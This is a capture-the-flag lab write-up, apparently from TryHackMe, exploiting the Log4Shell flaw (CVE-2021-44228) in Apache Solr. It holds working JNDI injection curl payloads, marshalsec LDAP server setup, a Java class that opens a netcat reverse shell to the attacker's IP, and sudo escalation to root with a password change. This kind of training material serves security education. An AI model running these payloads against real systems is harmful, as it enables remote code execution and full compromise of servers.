Log4j Solr THM
Log4j
Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü. It is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is one of several Java logging frameworks.
What is apache solr
Solr is an open-source enterprise-search platform, written in Java. Its major features include full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, database integration, NoSQL features and rich document handling.
Log4j attack
On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this log4j version. This attack has been dubbed “Log4Shell”
Reference:
https://github.com/fullhunt/log4j-scan
https://www-bleepingcomputer-com.cdn.ampproject.org/v/s/www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/amp/?amp_js_v=a6&_gsa=1&usqp=mq331AQKKAFQArABIIACAw%3D%3D#aoh=16392146824983&_ct=1639214693284&referrer=https%3A%2F%2Fwww.google.com&_tf=From%20%251%24s&share=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fnew-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare%2F
https://logging.apache.org/log4j/2.x/security.html
https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/
https://github.com/zhuowei/GhidraLog4Shell
https://twitter.com/fullhunt/status/1470275912449105930?s=24
Starting Lab THM
Starting with nmap scan -sV and -sC
nmap -sV -sC 10.10.67.21 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-19 00:01 EST
Nmap scan report for 10.10.67.21
Host is up (0.19s latency).
Not shown: 937 closed ports, 61 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:35:e1:4f:4e:87:45:9e:5f:2c:97:e0:da:a9:df:d5 (RSA)
| 256 b2:fd:9b:75:1c:9e:80:19:5d:13:4e:8d:a0:83:7b:f9 (ECDSA)
|_ 256 75:20:0b:43:14:a9:8a:49:1a:d9:29:33:e1:b9:1a:b6 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.24 seconds
Not getting the solr service then Started Scanning with -p-
nmap -p- -sV 10.10.67.21
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-19 00:14 EST
Stats: 0:04:54 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 24.23% done; ETC: 00:33 (0:14:39 remaining)
Stats: 0:17:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 37.25% done; ETC: 01:01 (0:29:31 remaining)
Stats: 0:31:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 64.10% done; ETC: 01:03 (0:17:27 remaining)
Nmap scan report for 10.10.67.21
Host is up (0.18s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind 2-4 (RPC #100000)
8983/tcp open http Apache Solr
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3145.17 seconds
Apache Solr is runnig on port 8983
nmap -p8983 10.10.67.21 -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-19 00:59 EST
Nmap scan report for 10.10.67.21
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
8983/tcp open http Apache Solr
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.83 seconds
accessing that using web browser
firefox http://10.10.67.21:8983/
We got lot of logs and there are some imp directories
-Dsolr.log.dir : /var/solr/logs
And before we getting into Log4j attack we must aware of some terms like what is LDAP and JNDI and JNDI injection so on ..
Java Naming and Directory Interface (JNDI)
The Java Naming and Directory Interface is a Java API for a directory service that allows Java software clients to discover and look up data and resources via a name. Like all Java APIs that interface with host systems, JNDI is independent of the underlying implementation.
Lightweight Directory Access Protocol (LDAP)
The Lightweight Directory Access Protocol is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network.
jndi-injections-java
https://www.veracode.com/blog/research/exploiting-jndi-injections-java
While searching about the apache solr got some interesting api (for injecting params)
/admin/cores?
referance of how to use coreadmin api
https://solr.apache.org/guide/6_6/coreadmin-api.html
**Testing log4j is possible or not **
mr4dot
$ nc -nlvp 9001
mr4dot
$ curl '10.10.2.185:8983/solr/admin/cores?hello=$\{jndi:ldap://10.9.0.246:9001\}'
{
"responseHeader":{
"status":0,
"QTime":0},
"initFailures":{},
"status":{}}
mr4dot
$ nc -nlvp 9001 1 ⨯
listening on [any] 9001 ...
connect to [10.9.0.246] from (UNKNOWN) [10.10.2.185] 39326
0
`�
We need to setup the our java version to java 1.8.0_181
Steps to setup it locally
Donwload java from mirror
http://mirrors.rootpei.com/jdk/
Download below version of jdk
jdk-8u181-linux-x64.tar.gz
$ mkdir /usr/lib/jvm
$ tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
java version "1.8.0_181"
Java(TM) SE Runtime Environment (build 1.8.0_181-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.181-b13, mixed mode)
Build marshalsec with the Java builder maven so we need to install maven first
Maven
Maven is a command-line tool for building Java applications; it is written in Java and is used for building JVM programs. Therefore, it is necessary that Java is installed into the system prior to installing and using Maven.
$ sudo apt install maven
marshalsec setup
$ git clone https://github.com/mbechler/marshalsec
$ cd marshalsec
To build marshalsec run the command in marshalsec folder.
$ mvn clean package -DskipTests
LDAP referral server to direct connections to our secondary HTTP server setup command (run in marshalsec folder)
$ java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.9.1.21:9999/#Exploit"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389
LDAP server runnign on port 1389
Create a java payload for reverse connection Exploit.java
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.9.1.21 9090");
} catch (Exception e) {
e.printStackTrace();
}
}
}
Serve it on same port we used to start LDAP Ref Server
$ python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/)
Start Listener using nc
$ nc -nlvp 9090
calling the payload using curl command
$ curl '10.10.226.102:8983/solr/admin/cores?cmd=$\{jndi:ldap://10.9.1.21:1389/Exploit\}'
{
"responseHeader":{
"status":0,
"QTime":0},
"initFailures":{},
"status":{}}
Woohoo!!!! Got Shell
nc -nlvp 9090
listening on [any] 9090 ...
connect to [10.9.1.21] from (UNKNOWN) [10.10.226.102] 44250
whoami
solr
Spawning shell
$ python3 -c "import pty; pty.spawn('/bin/bash')"
$ export TERM=xterm
Root access
solr@solar:/opt/solr/server$ sudo -l
sudo -l
Matching Defaults entries for solr on solar:
env_reset, exempt_group=sudo, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User solr may run the following commands on solar:
(ALL) NOPASSWD: ALL
solr@solar:/opt/solr/server$ su bash
su bash
No passwd entry for user 'bash'
solr@solar:/opt/solr/server$ sudo bash
sudo bash
root@solar:/opt/solr-8.11.0/server# passwd
passwd
Enter new UNIX password: 123.com
Retype new UNIX password: 123.com
passwd: password updated successfully
root@solar:/opt/solr-8.11.0/server#
$ ssh [email protected]